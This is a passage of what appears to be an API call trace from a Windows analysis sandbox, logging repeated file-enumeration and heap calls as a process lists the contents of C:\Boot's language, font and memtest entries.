ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.964] FindClose (in: hFindFile=0x6e49f8 | out: hFindFile=0x6e49f8) returned 1 [0032.964] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.964] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0032.965] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.965] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e49f8 [0032.965] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.965] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.965] FindClose (in: hFindFile=0x6e49f8 | out: hFindFile=0x6e49f8) returned 1 [0032.965] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.965] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0032.965] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.965] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e49f8 [0032.965] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.965] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.965] FindClose (in: hFindFile=0x6e49f8 | out: hFindFile=0x6e49f8) returned 1 [0032.965] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.965] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0032.966] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.966] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e49f8 [0032.966] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.966] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.966] FindClose (in: hFindFile=0x6e49f8 | out: hFindFile=0x6e49f8) returned 1 [0032.966] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.966] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0032.966] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.966] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e49f8 [0032.966] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.966] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0032.967] FindClose (in: hFindFile=0x6e49f8 | out: hFindFile=0x6e49f8) returned 1 [0032.967] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.967] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0032.967] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.967] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.968] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.968] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.968] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.968] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.968] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0032.968] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.968] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.969] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.969] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.969] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.969] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.969] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0032.969] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.969] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.970] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.970] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.970] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.970] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.970] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0032.970] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.970] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.971] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.971] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.971] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.971] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.971] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0032.971] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.971] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.972] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.972] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.972] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.972] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.972] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0032.972] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.972] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.973] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.973] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.973] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.973] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.973] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, 